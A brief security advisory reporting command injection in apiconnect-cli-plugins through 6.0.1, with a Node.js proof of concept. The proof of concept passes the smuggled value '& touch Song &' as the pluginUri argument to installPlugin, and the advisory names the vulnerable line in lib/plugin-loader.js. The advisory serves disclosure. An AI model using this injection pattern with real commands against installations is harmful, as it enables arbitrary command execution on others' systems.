apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the pluginUri
argument.
var root = require("apiconnect-cli-plugins");
var payload = "& touch Song &";
root.pluginLoader.installPlugin(payload, "");
The injection point is located in line 181 of file lib/plugin-loader.js
, in the function installPlugin(pluginUri, registryUri)
.